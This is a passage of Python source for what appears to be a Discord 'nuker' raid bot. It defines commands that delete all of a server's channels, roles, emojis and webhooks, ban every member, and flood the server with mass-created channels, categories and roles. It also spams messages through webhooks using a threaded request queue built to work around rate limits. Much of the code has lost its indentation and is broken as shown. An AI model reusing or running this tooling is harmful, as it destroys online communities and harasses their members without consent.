await log(ctx, f'Channel `{channel.name}` is deleted.')
except:
await log(ctx, f'Unable to delete channel `{channel.name}`.')
raise
@commands.check(checkPerm)
@client.command(name='deleteVoiceChannel', aliases=['dVC', 'dVoiceChannel'])
async def deleteVoiceChannel(ctx, VC_name):
if not await hasTarget(ctx):
return
    channel = containing(selected_server.voice_channels, VC_name)
    if channel is None:
        await log(ctx, f'Unable to find voice channel `{VC_name}`.')
        return
try:
await channel.delete(reason=None)
await log(ctx, f'Voice channel `{channel.name}` is deleted.')
except:
consoleLog(f'Unable to delete voice channel `{channel.name}`.')
raise
@commands.check(checkPerm)
@client.command(name='deleteCategory', aliases=['dCat', 'dCategory'])
async def deleteCategory(ctx, *, category_name):
if not await hasTarget(ctx):
return
    channel = containing(selected_server.categories, category_name)
    if channel is None:
        await log(ctx, f'Unable to find category `{category_name}`.')
        return
try:
await channel.delete(reason=None)
await log(ctx, f'Category `{channel.name}` is deleted.')
except:
await log(ctx, f'Unable to delete category `{channel.name}`.')
raise
@commands.check(checkPerm)
@client.command(name='deleteCC', aliases=['dCC'])
async def deleteCC(ctx, *, name):
if not await hasTarget(ctx):
return
channel = containing(selected_server.channels, name)
if channel is None:
await log(ctx, f'Unable to find channel `{name}`.')
return
try:
await channel.delete(reason=None)
await log(ctx, f'Channel `{channel.name}` is removed from `{selected_server.name}`.')
except:
await log(ctx, f'Unable to delete channel `{channel.name}`.')
raise
@commands.check(checkPerm)
@client.command(name='deleteEmoji', aliases=['dEm'])
async def deleteEmoji(ctx, *, name):
    if not await hasTarget(ctx):
        return
    emoji = containing(selected_server.emojis, name)
    if emoji is None:
        await log(ctx, f'Unable to find emoji `{name}`.')
        return
    try:
        await emoji.delete(reason=None)
        await log(ctx, f'Emoji `{emoji.name}` is removed from the server.')
except:
await log(ctx, f'Unable to delete emoji: `{emoji.name}`.')
raise
@commands.check(checkPerm)
@client.command(name='ban')
async def ban(ctx, member_:discord.Member):
if not await hasTarget(ctx):
return
try:
await member_.ban()
await log(ctx, f'Successfully banned `{member_.name}#{member_.discriminator}`.')
except:
await log(ctx, f'Unable to ban `{member_.name}#{member_.discriminator}`.')
raise
@commands.check(checkPerm)
@client.command(name='unban')
async def unban(ctx, *, name):
if not await hasTarget(ctx):
return
member_ = containing([s.user for s in await selected_server.bans()], nameIdHandler(name))
if member_ is None:
await log(ctx, f'Unable to find user `{name}` in server `{selected_server.name}`.')
return
try:
await selected_server.unban(member_)
await log(ctx, f'`{member_.name}#{member_.discriminator}` is now free :).')
except:
await log(ctx, f'Failed to unban `{member_.name}#{member_.discriminator}`.')
raise
@commands.check(checkPerm)
@client.command(name='roleTo')
async def roleTo(ctx, member_name, *, role_name):
if not await hasTarget(ctx):
return
role = containing(selected_server.roles, nameIdHandler(role_name))
if role is None:
await log(ctx, f'Unable to find role `{role_name}`.')
return
# discord.utils.get is useless don't use it it's way slower than "containing"
member_ = containing(selected_server.members, nameIdHandler(member_name))
if member_ is None:
await log(ctx, f'Unable to find user `{member_name}`.')
return
if role in member_.roles:
try:
await member_.remove_roles(role)
await log(ctx, f'Successfully removed role `{role.name}` from user `{member_.name}`.')
except:
await log(ctx, f'Unable to remove role `{role.name}` from user `{member_.name}`.')
raise
else:
try:
await member_.add_roles(role)
await log(ctx, f'Successfully given role `{role.name}` to user `{member_.name}`.')
except:
await log(ctx, f'Unable to add role `{role.name}` to user `{member_.name}`.')
raise
@commands.check(checkPerm)
@client.command(name='disableCommunityMode', aliases=['dCM', 'dCommunityMode'])
async def disableCommunityMode(ctx):
if not await hasTarget(ctx):
return
try:
await log(ctx, f'{Fore.YELLOW}Disabling community mode')
r = requests.patch(f'https://discord.com/api/v8/guilds/{selected_server.id}', headers=headers, json=
{'description': None, 'features': {'0': 'NEWS'},
'preferred_locale': 'en-US',
'public_updates_channel_id': None, 'rules_channel_id': None})
consoleLog(f'Disabling community mode response -> {r.text}', True)
await log(ctx, f'{Fore.GREEN}Disabled community mode.')
except Exception as e:
consoleLog(f'{Fore.RED}Error while attempting to disable community mode, {e}', True)
raise
@commands.check(checkPerm)
@client.command(name='grantAllPerm', aliases=['gap'])
async def grantAllPerm(ctx):
global grant_all_permissions
if grant_all_permissions:
await log(ctx, 'Now only people with permissions can use the commands.')
grant_all_permissions = False
else:
await log(ctx, 'Now everyone can use the bot commands')
grant_all_permissions = True
######### Bombs #########
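# Every bomb command takes a count and a naming method ('fixed', 'b64' or 'an')
# and queues its creation requests on the shared request queue defined below.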
@commands.check(checkPerm)
@client.command(name='kaboom')
async def kaboom(ctx, n, method):
if not await hasTarget(ctx):
return
if not n.isdigit() or int(n) < 0:
await log(ctx, 'Please enter a positive integer.')
return
await log(ctx, f'A series of bombs have been dropped onto `{selected_server.name}`.')
tasks = [channelBomb(ctx, n, method), categoryBomb(ctx, n, method), roleBomb(ctx, n, method)]
await asyncio.gather(*tasks)
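# Shared request worker pool: `concurrent` daemon threads pull
# (request method, url, headers, payload) tuples from `q`, fire the HTTP call,
# and re-queue it when Discord rate limits the request. Callers use q.join()
# to wait until everything they queued has been processed, e.g.:
#     q.put((requests.post, f'https://discord.com/api/v8/guilds/{selected_server.id}/roles', headers, {'name': 'example'}))
#     q.join()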
concurrent = 100
q = Queue(concurrent * 2)
def requestMaker():
    while True:
        requesting, url, headers, payload = q.get()
        try:
            # proxy = randomProxy('https')
            # r = requesting(url, data=json.dumps(payload), headers=headers, proxies=proxy, timeout=timeout)
            r = requesting(url, data=json.dumps(payload), headers=headers, timeout=timeout)
            if r.status_code == 429:
                r = r.json()
                if isinstance(r['retry_after'], int): # Discord returns an integer (in milliseconds) when the retry-after time is less than 10 seconds.
                    r['retry_after'] /= 1000
                if r['retry_after'] > 5:
                    if want_log_request:
                        consoleLog(f'Rate limiting has been reached, and this request has been cancelled because the retry-after time is greater than 5 seconds: Wait {str(r["retry_after"])} more seconds.')
                    q.task_done()
                    continue
                if want_log_request:
                    consoleLog(f'Rate limiting has been reached: Wait {str(r["retry_after"])} more seconds.')
                q.put((requesting, url, headers, payload))
            elif want_log_request:
                body = r.json()
                if 'code' in body:
                    consoleLog('Request cancelled due to -> ' + body['message'])
        except json.decoder.JSONDecodeError:
            pass
        # except requests.exceptions.ProxyError:
        #     consoleLog(f'Proxy "{proxy}" did not respond to a request. Trying...')
        #     q.put((requesting, url, headers, payload))
        except requests.exceptions.ConnectTimeout:
            consoleLog(f'Reached maximum load time: timeout is {timeout} seconds long')
            q.put((requesting, url, headers, payload))
        except Exception as e:
            consoleLog(f'Unexpected error: {str(e)}')
        q.task_done()
for i in range(concurrent):
Thread(target=requestMaker, daemon=True).start()
@commands.check(checkPerm)
@client.command(name='channelBomb')
async def channelBomb(ctx, n, method='fixed'):
if not await hasTarget(ctx):
return
if not n.isdigit() or (n := int(n)) < 0:
await log(ctx, 'Please insert an integer that is greater than 0.')
return
if method == 'fixed':
method = fixedChoice
elif method == 'b64':
method = random_b64
elif method == 'an':
method = random_an
else:
await log(ctx, f'Unable to find choice "{method}".')
return
consoleLog('Channel bombing has started.', True)
for i in range(n):
payload = {
'type': 0,
'name': method(),
'permission_overwrites': []
}
q.put((requests.post, f'https://discord.com/api/v8/guilds/{selected_server.id}/channels', headers, payload))
q.join()
consoleLog('Done text channel bombing.', True)
@commands.check(checkPerm)
@client.command(name='categoryBomb')
async def categoryBomb(ctx, n, method):
if not await hasTarget(ctx):
return
if not n.isdigit() or (n := int(n)) < 0:
await log(ctx, 'Please insert an integer that is greater than 0.')
return
if method == 'fixed':
method = fixedChoice
elif method == 'b64':
method = random_b64
elif method == 'an':
method = random_an
else:
await log(ctx, f'Unable to find choice "{method}".')
return
    consoleLog('Category bombing has started.', True)
for i in range(n):
payload = {
'type': 4,
'name': method(),
'permission_overwrites': []
}
q.put((requests.post, f'https://discord.com/api/v8/guilds/{selected_server.id}/channels', headers, payload))
q.join()
consoleLog('Done category bombing.', True)
@commands.check(checkPerm)
@client.command(name='roleBomb')
async def roleBomb(ctx, n, method):
if not await hasTarget(ctx):
return
if not n.isdigit() or (n := int(n)) < 0:
await log(ctx, 'Please insert an integer that is greater than 0.')
return
if method == 'fixed':
method = fixedChoice
elif method == 'b64':
method = random_b64
elif method == 'an':
method = random_an
else:
await log(ctx, f'Unable to find choice "{method}".')
return
consoleLog('Role bombing has started.', True)
for i in range(n):
payload = {
'name': method()
}
q.put((requests.post, f'https://discord.com/api/v8/guilds/{selected_server.id}/roles', headers, payload))
q.join()
consoleLog('Done role bombing.', True)
# @commands.check(checkPerm)
# @client.command(name='massDM', aliases=['md'])
# async def massDM(ctx, command, *, args=None):
# if len(server_members) == 0:
# await log(ctx, 'You don\'t have anything anyone to dm with :(. Fetch some members.')
# return
# if args is not None:
# args = args.split()
# if command == 'channels' or command == 'channel':
# if args is None:
# args = []
# args.append('1')
# members_ = []
# for i in range(len(server_members)):
# if members_[i].channel_id is not None:
# members_[i].id = members_[i].channel_id
# await embed(ctx, args[0], 'MassDM targets', members_)
# elif command == 'load':
# for member_ in server_members:
# print(member_.name)
# if int(member_.id) == client.user.id:
# continue
# # asdf = requests.post('https://discordapp.com/api/v8/users/@me/channels', headers=headers, json={'recipient_id': member_.id}, proxies=randomProxy('https'), timeout=timeout).json()
# member_.__init__(member_.name, member_.id, member_.discriminator, client.get_user(member_.id).dm_channel.id)
# elif command == 'start':
# massDM_channels = [i.channel_id for i in server_members if i.channel_id is not None]
# if len(massDM_channels) == 0:
# await log(ctx, 'You don\'t have any DM loaded.')
# return
# for channel_id in massDM_channels:
# q.put((f'https://discordapp.com/api/v8/channels{channel_id}/messages', headers))
######### webhooks ##########
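# The webhook command bundles several sub-operations: listing, creating and
# deleting webhooks, plus an attack mode that spams messages through the
# webhooks loaded into the target list.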
@commands.check(checkPerm)
@client.command(name='webhook', aliases=['webhooks', 'wh'])
async def webhook(ctx, *, args=None):
if not await hasTarget(ctx):
return
if args is None or args.isdigit(): # webhook list
if args is None:
args = '1'
try:
await embed(ctx, args, 'Webhooks', await selected_server.webhooks())
return
except:
raise
args = args.split()
if args[0] == 'create' or args[0] == 'add': # webhook create
# global headers
del args[0]
if len(args) < 1:
            await log(ctx, f'More arguments are required. You can put how many webhooks you want to create, or the ids/names of the channels you want the webhooks to be created on.')
return
name = ' '.join(args)
webhooks = await selected_server.webhooks()
webhooks_length = len(webhooks)
channels = name.split()
        if len(channels) == 1 and channels[0].lstrip('-').isdigit() and int(channels[0]) < 100000000: # A single small number: treat it as how many webhooks to create
            amount = int(channels[0])
            if amount < 0:
                await log(ctx, f'You thought a smol negative number will break this bot?')
                return
            if amount <= 50: ## probably will replace this with auto check channel id
                channels = selected_server.text_channels
                if amount > len(channels):
                    await log(ctx, f'This adding webhooks method can only distribute webhooks evenly and randomly throughout the text channels. You entered `{name}`, and there are only `{str(len(channels))}` text channel(s) in the server. If you don\'t want to add more text channels, you can use this command a few more times with a positive integer that is less than `{str(len(channels) + 1)}`.')
                    return
                for i in range(amount):
                    payload = {'name': random_b64(10)}
                    q.put((requests.post, f'https://discord.com/api/v8/channels/{channels.pop(randrange(len(channels))).id}/webhooks', headers, payload))
                q.join()
                await log(ctx, f'`{name}` webhooks have been created.')
            else:
                await log(ctx, f'The maximum webhooks that can be created every hour per server is 50. And you entered `{name}`.')
        else: # Channel names or IDs: create one webhook on each given channel
            for channel in channels:
                checked_channel = containing(selected_server.text_channels, channel)
                if checked_channel is None:
                    await log(ctx, f'Cannot find channel {channel}.')
                    continue
                payload = {'name': random_b64(10)}
                q.put((requests.post, f'https://discord.com/api/v8/channels/{checked_channel.id}/webhooks', headers, payload))
elif args[0] == 'delete' or args[0] == 'remove':
name = args[1]
webhook = containing(await selected_server.webhooks(), name)
if webhook is None:
await log(ctx, f'Unable to find webhook `{name}`.')
return
requests.delete(f'https://discord.com/api/v8/webhooks/{webhook.id}', headers=headers)
await log(ctx, f'Webhook `{webhook.name}` is removed from the server.')
elif args[0] == 'attack':
global webhook_targets
        args.pop(0) # Removing the attack keyword
        if len(args) == 0:
            await log(ctx, f'The attack operation needs more arguments. Try `{settings["command_prefix"]}webhook attack all`, then `{settings["command_prefix"]}webhook attack start <number of messages>`.')
            return
try:
webhooks = await selected_server.webhooks()
webhooks_length = len(webhooks)
loaded_length = 0
if len(args) > 0 and args[0].lower() == 'all':
for webhook in webhooks:
webhook_targets.append(webhook)
loaded_length += 1
elif args[0] == 'start':
target_list_length = len(webhook_targets)
if target_list_length == 0:
await log(ctx, f'Looks like there really isn\'t any targets in the attack list. Maybe try: `{settings["command_prefix"]}webhook attack all`, then `{settings["command_prefix"]}webhook attack start <number of messages>`.')
return
_headers = {
'content-type': 'application/json'
}
if len(args) < 2:
args.append(10)
elif not args[1].isdigit():
await log(ctx, 'Please enter a positive integer.')
return
usernames_length = len(settings['webhook_spam']['usernames'])
contents_length = len(settings['webhook_spam']['contents'])
pfp_length = len(settings['webhook_spam']['pfp_urls'])
for i in range(int(args[1])):
payload = {
'username': choice(settings['webhook_spam']['usernames']),
'content': choice(settings['webhook_spam']['contents']),
'avatar_url': choice(settings['webhook_spam']['pfp_urls'])
}
q.put((requests.post, webhook_targets[randrange(target_list_length)].url, _headers, payload))
elif len(args) > 0 and args[0].isdigit() and int(args[0]) <= webhooks_length:
for i in range(int(args[0])):
webhook_targets.append(webhooks.pop(randrange(webhooks_length)))
webhooks_length -= 1
loaded_length += 1
elif args[0] == 'list':
if len(args) < 2:
args.append('1')
await embed(ctx, args[1], 'Targets on attacking list', webhook_targets)
elif args[0] == 'offload':
webhook_targets = []
await log(ctx, f'All webhooks have been offloaded')
            else:
                for webhook_name in args:
                    webhook = containing(await selected_server.webhooks(), webhook_name)
                    if webhook is None:
                        await log(ctx, f'Unable to find webhook `{webhook_name}`.')
                        continue
                    webhook_targets.append(webhook)
                    loaded_length += 1
if args[0] != 'list' and args[0] != 'start' and args[0] != 'offload':
                await log(ctx, f'`{str(loaded_length)}` webhook(s) have been loaded into the target list.')
except:
raise
else:
await log(ctx, f'Unable to find `{args[0]}` command in webhook scripts.')
######### Nukes #########
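# nuke runs all the destructive tasks concurrently with asyncio.gather and then
# executes the configured "after" commands.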
@commands.check(checkPerm)
@client.command(name='nuke')
async def nuke(ctx):
if not await hasTarget(ctx):
return
await log(ctx, f'A nuke has been launched to `{selected_server.name}`.')
tasks = [disableCommunityMode(ctx), deleteAllChannels(ctx), deleteAllRoles(ctx), banAll(ctx), deleteAllWebhooks(ctx), deleteAllEmojis(ctx)]
await asyncio.gather(*tasks)
if len(settings['after']) > 0:
if not isDM(ctx) and selected_server.id == ctx.guild.id:
ctx.message.channel = None
consoleLog(f'{Fore.BLUE}Running after commands...', True)
for command in settings['after']:
# Lol im so smart to think something like this would work
try:
ctx.message.content = settings['command_prefix'] + command
await client.process_commands(ctx.message)
except:
consoleLog(f'{Fore.RED}Command {Fore.YELLOW}"{settings["command_prefix"]}{command}" {Fore.RED}has failed to execute.', True)
pass
consoleLog(f'{Fore.GREEN}After commands completed.')
@commands.check(checkPerm)
@client.command(name='deleteAllRoles', aliases=['dar', 'dAllRoles'])
async def deleteAllRoles(ctx):
if not await hasTarget(ctx):
return
consoleLog(f'{Fore.YELLOW}Starting to delete all roles...', True)
for role in selected_server.roles:
q.put((requests.delete, f'https://discord.com/api/v8/guilds/{selected_server.id}/roles/{role.id}', headers, None))
q.join()
consoleLog(f'{Fore.GREEN}Finished deleting roles.', True)
@commands.check(checkPerm)
@client.command(name='deleteAllChannels', aliases=['dac', 'dAllChannels'])
async def deleteAllChannels(ctx):
if not await hasTarget(ctx):
return
consoleLog(f'{Fore.YELLOW}Starting to delete all types of channels...', True)
for channel in selected_server.channels:
q.put((requests.delete, f'https://discord.com/api/v8/channels/{channel.id}', headers, None))
q.join()
consoleLog(f'{Fore.GREEN}Finished deleting channels.', True)
@commands.check(checkPerm)
@client.command(name='deleteAllEmojis', aliases=['dae', 'dAllEmoji'])
async def deleteAllEmojis(ctx):
if not await hasTarget(ctx):
return
consoleLog(f'{Fore.YELLOW}Starting to delete all emojis...', True)
for emote in selected_server.emojis:
q.put((requests.delete, f'https://discord.com/api/v8/guilds/{selected_server.id}/emojis/{emote.id}', headers, None))
q.join()
consoleLog(f'{Fore.GREEN}Finished deleting emojis.', True)
@commands.check(checkPerm)
@client.command(name='deleteAllWebhooks', aliases=['daw', 'dAllWebhooks'])
async def deleteAllWebhooks(ctx):
if not await hasTarget(ctx):
return
consoleLog(f'{Fore.YELLOW}Starting to delete all webhooks...', True)
for webhook in await selected_server.webhooks():
q.put((requests.delete, f'https://discord.com/api/v8/webhooks/{webhook.id}', headers, None))
q.join()
consoleLog(f'{Fore.GREEN}Finished deleting webhooks.', True)
@commands.check(checkPerm)
@client.command(name='banAll')
async def banAll(ctx):
if not await hasTarget(ctx):
return
payload = {'delete_message_days':'0', 'reason': ''}
consoleLog(f'{Fore.YELLOW}Starting ban all...', True)
for member_ in selected_server.members:
if f'{member_.name}#{member_.discriminator}' in settings['ban_whitelist'] or str(member_.id) in settings['ban_whitelist']:
consoleLog(f'Ban skipped for {member_.name}#{member_.discriminator} -> in ban whitelist')
continue
q.put((requests.put, f'https://discord.com/api/v8/guilds/{selected_server.id}/bans/{member_.id}', headers, payload))
q.join()
consoleLog(f'{Fore.GREEN}Ban all completed.', True)
## Configuration command ##
@commands.check(checkPerm)
@client.command(name='config')
async def config(ctx, command=None, *, args=None):
global settings, settings_copy
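    # Paginated embed helper shared by the config sub-commands below to list and page through items.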
async def embed_list(n, title, array):
if not n.isdigit() or (n := int(n) - 1) < 0:
await log(ctx, 'Bad page number.')
return
names = ''
item_length = len(array)
if item_length == 0:
return await ctx.send(f'{title} count: 0')
init_item = n * per_page
final_item = init_item + per_page
if init_item > item_length - per_page:
if init_item > item_length:
await ctx.send('Invalid page number.')
return
final_item = init_item + (item_length % per_page)
else:
final_item = init_item + per_page
for i in range(init_item, final_item, 1):
item = array[i]
if len(item) > 17:
item = item[:17] + '...'
names += f'{str(i+1)}) {item}\n'
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = title,
description = f'Total count: {str(item_length)}; color: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Items', value=names, inline=True)
embed.set_footer(text=f'{n+1}/{str(ceil(item_length / per_page))}\n' +
('Config is saved' if configIsSaved() else '(*)Config is not saved'))
await ctx.send(embed=embed)
if command is None:
status_list = []
features_list = []
temp = settings.copy()
features_list.append('bomb_messages')
if temp['bomb_messages']['random'] is None or len(temp['bomb_messages']['fixed']) == 0:
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
features_list.append('webhook_spam')
if len(temp['webhook_spam']['usernames']) == 0 or len(temp['webhook_spam']['pfp_urls']) == 0 or len(temp['webhook_spam']['contents']) == 0:
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
del temp['bomb_messages']
del temp['webhook_spam']
for feature in temp:
features_list.append(feature)
if settings[feature] is None or (type(settings[feature]).__name__ == 'list' and len(settings[feature]) == 0):
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'Nuking features',
description = f':white_check_mark: = Ready to use\n:x: = Needs to config\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Status', value='\n'.join(status_list), inline=True)
embed.add_field(name='Features', value='\n'.join(features_list), inline=True)
        embed.add_field(name='Usage', value=f'Use `{settings["command_prefix"]}config <feature>` to get more information about how to config that feature.\n\n`{settings["command_prefix"]}config save <file name>` to save the current config. If you save the config as `default.json`, the bot will load that file automatically the next time it starts.', inline=False)
embed.set_footer(text='Config is saved' if configIsSaved() else '(*)Config is not saved')
await ctx.send(embed=embed)
return
command = command.lower()
#################
# permissions #
#################
if command == 'permissions' or command == 'permission' or command == 'perms' or command == 'perm':
if args is None:
status_list = []
features_list = []
features_list.append('permissions')
if len(settings['permissions']) == 0:
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'Permissions list',
description = f'Permissions for using the bot are given to the users.\n\n:white_check_mark: = Ready to use\n:x: = Needs to config\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Status', value='\n'.join(status_list), inline=True)
embed.add_field(name='Features', value='\n'.join(features_list), inline=True)
embed.add_field(name='Usage', value=f'`permissions add <userTag or userID> [userTag or userID] [user...` - grant permissions to the given user(s)\n\n`permissions remove <line number> [line number] [line...` - remove line(s) from the list\n\n`permissions list [page number]` - list all users that are in the permission list', inline=False)
embed.set_footer(text=('Config is saved' if configIsSaved() else '(*)Config is not saved'))
await ctx.send(embed=embed)
else:
args = args.split()
def alreadyExisted(checkingID):
for userID_index in range(len(settings['permissions'])):
if settings['permissions'][userID_index] == checkingID:
return True, userID_index
return False, None
if args[0] == 'add':
del args[0]
for userID in args:
existed, checkedID_index = alreadyExisted(userID)
if existed:
                        await log(ctx, f'Failed to add `{settings["permissions"][checkedID_index]}`. It already exists in the permission list.')
continue
else:
settings['permissions'].append(userID)
elif args[0] == 'remove':
if len(args) > 1:
del args[0]
offset = 1
initial_length = len(settings['permissions'])
for item in args:
if item.isdigit() and (0 <= (item := int(item)) - offset <= initial_length - offset):
del settings['permissions'][item - offset]
offset += 1
else:
await log(ctx, f'Skipped deleting line `{item}` -> not an integer between 1 and {str(initial_length)}.')
await log(ctx, f'Successfully removed `{str(offset - 1)}` items.')
else:
                    await log(ctx, f'Enter line(s) to remove from the permission list.')
elif args[0] == 'list':
await embed_list(args[1] if len(args) > 1 else '1', 'permission list', settings['permissions'])
else:
            await log(ctx, f'Unknown operation: `{args[0]}`')
#################
# bomb_messages #
#################
elif command == 'bomb_messages' or command == 'bomb_message' or command == 'bomb':
if args is None:
status_list = []
features_list = []
features_list.append('random')
if settings['bomb_messages']['random'] is None:
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
features_list.append('fixed')
if len(settings['bomb_messages']['fixed']) == 0:
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'bomb_messages',
                description = f'Config for all the bomb commands.\nWhen you run a bomb command like `{settings["command_prefix"]}channelbomb 100 fixed`, `fixed` is the type of word list to use; in this case the texts are randomly picked from the "fixed" list.\n\n:white_check_mark: = Ready to use\n:x: = Needs to config\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Status', value='\n'.join(status_list), inline=True)
embed.add_field(name='Types', value='\n'.join(features_list), inline=True)
embed.add_field(name='Usage', value=f'`bomb_messages fixed add <command>` - add contents to the back of the list\n\n`bomb_messages fixed remove <line number> [line number] [line...` - remove line(s) from the list\n\n`bomb_messages fixed list [page number]` - list contents that are in the content list\n\n`bomb_messages random <character length>` - sets character length for bomb commands like `{settings["command_prefix"]}kaboom 100 b64`(b64 = base64) ', inline=False)
embed.set_footer(text='Config is saved' if configIsSaved() else '(*)Config is not saved')
await ctx.send(embed=embed)
else:
args = args.split()
if args[0].lower() == 'random':
if len(args) > 1 and args[1].isdigit() and (1 <= (length := int(args[1])) <= 1024):
settings['bomb_messages']['random'] = length
await log(ctx, f'Random-message length has been set to `{str(length)}`.')
else:
await log(ctx, 'Please enter a positive integer that is between 1 and 1024.')
elif args[0].lower() == 'fixed':
if args[1] == 'add':
if len(args) > 2 and (1 <= len(text := ' '.join(args[2:])) <= 100):
settings['bomb_messages']['fixed'].append(text)
await log(ctx, f'Text added. Character length: `{str(len(text))}`.')
else:
await log(ctx, f'Please enter something that has 1 to 100 characters.')
elif args[1] == 'remove':
if len(args) > 2:
del args[0], args[0]
offset = 1
initial_length = len(settings['bomb_messages']['fixed'])
for item in args:
if item.isdigit() and (0 <= (item := int(item)) - offset <= initial_length - offset):
del settings['bomb_messages']['fixed'][item - offset]
offset += 1
else:
await log(ctx, f'Skipped deleting line `{item}` -> not an integer between 1 and {str(initial_length)}.')
await log(ctx, f'Successfully removed `{str(offset - 1)}` items.')
else:
await log(ctx, f'Enter line(s) to remove from bomb_messages fixed list.')
elif args[1] == 'list':
await embed_list(args[2] if len(args) > 2 else '1', 'bomb_messages fixed list', settings['bomb_messages']['fixed'])
else:
await log(ctx, f'Unknown operation: `{args[1]}`')
else:
await log(ctx, f'Unable to find {args[0]} config.')
################
# webhook #
################
elif command == 'webhook_spam':
if args is None:
status_list = []
features_list = []
for feature in settings['webhook_spam']:
features_list.append(feature)
if len(settings['webhook_spam'][feature]) == 0:
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'webhook_spam',
description = f'Using webhook to spam messages. To send a message from discord webhook it requires 3 items: usernames, profile picture, and contents. For profile picture you can only put an image URL or put `none` for no pfp.\n\n:white_check_mark: = Ready to use\n:x: = Needs to config\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Status', value='\n'.join(status_list), inline=True)
embed.add_field(name='Types', value='\n'.join(features_list), inline=True)
embed.add_field(name='Usage', value=f'`webhook_spam <type> add <command>` - add contents to the back of the list\n\n`webhook_spam <type> remove <line number> [line number] [line...` - remove line(s) from the list\n\n`webhook_spam <type> list [page number]` - list contents that are in the content list', inline=False)
embed.set_footer(text=f'Config is saved' if configIsSaved() else '(*)Config is not saved')
await ctx.send(embed=embed)
else:
args = args.split()
if args[0] == 'usernames' or args[0] == 'username':
if args[1] == 'add':
if len(args) > 2 and (0 < len(text := ' '.join(args[2:])) <= 32):
settings['webhook_spam']['usernames'].append(text)
await log(ctx, f'Text added. Character length: `{str(len(text))}`.')
else:
await log(ctx, f'Please enter something that has 1 to 32 characters.')
elif args[1] == 'remove':
if len(args) > 2:
del args[0], args[0]
offset = 1
initial_length = len(settings['webhook_spam']['usernames'])
for item in args:
if item.isdigit() and (0 <= (item := int(item)) - offset <= initial_length - offset):
del settings['webhook_spam']['usernames'][item - offset]
offset += 1
else:
await log(ctx, f'Skipped deleting line `{item}` -> not an integer between 1 and {str(initial_length)}.')
await log(ctx, f'Successfully removed `{str(offset - 1)}` items.')
else:
await log(ctx, f'Enter line(s) to remove from usernames.')
elif args[1] == 'list':
await embed_list(args[2] if len(args) > 2 else '1', 'webhook_spam usernames list', settings['webhook_spam']['usernames'])
else:
await log(ctx, f'Unknown operation: `{args[1]}`')
elif args[0] == 'pfp_urls' or args[0] == 'pfp_url' or args[0] == 'pfp':
if args[1] == 'add':
                    if len(args) > 2 and args[2].lower() == 'none':
                        settings['webhook_spam']['pfp_urls'].append(None)
                        await log(ctx, f'No pfp item has been added.')
                    elif len(args) > 2 and (text := args[2]).startswith(('https://', 'http://')):
                        settings['webhook_spam']['pfp_urls'].append(text)
                        await log(ctx, f'URL added.')
else:
                        await log(ctx, f'Please enter an **image URL**. Note: the link must start with http(s) protocols. Or enter `none` for no pfp.')
elif args[1] == 'remove':
if len(args) > 2:
del args[0], args[0]
offset = 1
initial_length = len(settings['webhook_spam']['pfp_urls'])
for item in args:
if item.isdigit() and (0 <= (item := int(item)) - offset <= initial_length - offset):
del settings['webhook_spam']['pfp_urls'][item - offset]
offset += 1
else:
await log(ctx, f'Skipped deleting line `{item}` -> not an integer between 1 and {str(initial_length)}.')
await log(ctx, f'Successfully removed `{str(offset - 1)}` items.')
else:
await log(ctx, f'Enter line(s) to remove from pfp_urls.')
elif args[1] == 'list':
await embed_list(args[2] if len(args) > 2 else '1', 'webhook_spam pfp_urls list', settings['webhook_spam']['pfp_urls'])
else:
await log(ctx, f'Unknown operation: `{args[1]}`')
elif args[0] == 'contents' or args[0] == 'content':
if args[1] == 'add':
if len(args) > 1 and (0 < len(text := ' '.join(args[2:])) <= 2000):
settings['webhook_spam']['contents'].append(text)
await log(ctx, f'Text added. Character length: `{str(len(text))}`.')
else:
await log(ctx, f'Please enter something that has 1 to 2000 characters.')
elif args[1] == 'remove':
if len(args) > 2:
del args[0], args[0]
offset = 1
initial_length = len(settings['webhook_spam']['contents'])
for item in args:
if item.isdigit() and (0 <= (item := int(item)) - offset <= initial_length - offset):
del settings['webhook_spam']['contents'][item - offset]
offset += 1
else:
await log(ctx, f'Skipped deleting line `{item}` -> not an integer between 1 and {str(initial_length)}.')
await log(ctx, f'Successfully removed `{str(offset - 1)}` items.')
else:
await log(ctx, f'Enter line(s) to remove from contents.')
elif args[1] == 'list':
await embed_list(args[2] if len(args) > 2 else '1', 'webhook_spam contents list', settings['webhook_spam']['contents'])
else:
await log(ctx, f'Unknown operation: `{args[1]}`')
else:
await log(ctx, f'Unknown type: `{args[0]}`')
elif command == 'after':
if args is None:
status_list = []
features_list = []
features_list.append('after')
if len(settings['after']) == 0:
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'After commands',
                description = f'All the commands in this list will run after `{settings["command_prefix"]}nuke`.\n\n:white_check_mark: = Ready to use\n:x: = Needs to config\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Status', value='\n'.join(status_list), inline=True)
embed.add_field(name='Features', value='\n'.join(features_list), inline=True)
embed.add_field(name='Usage', value=f'`after add <command>` - add command to the back of the command list\n\n`after remove <line number> [line number] [line...` - remove line(s) in the command list\n\n`after insert <line number> <command>` - insert command after the given line. Note: use `insert 0 <command>` to insert the command to the first line\n\n`after list [page number]` - list commands that are in the command list', inline=False)
embed.set_footer(text=f'Config is saved' if configIsSaved() else '(*)Config is not saved')
await ctx.send(embed=embed)
else:
args = args.split()
if args[0] == 'add':
if len(args) > 1:
text = ' '.join(args[1:])
settings['after'].append(text)
await log(ctx, f'Command added. Character length: `{str(len(text))}`.')
else:
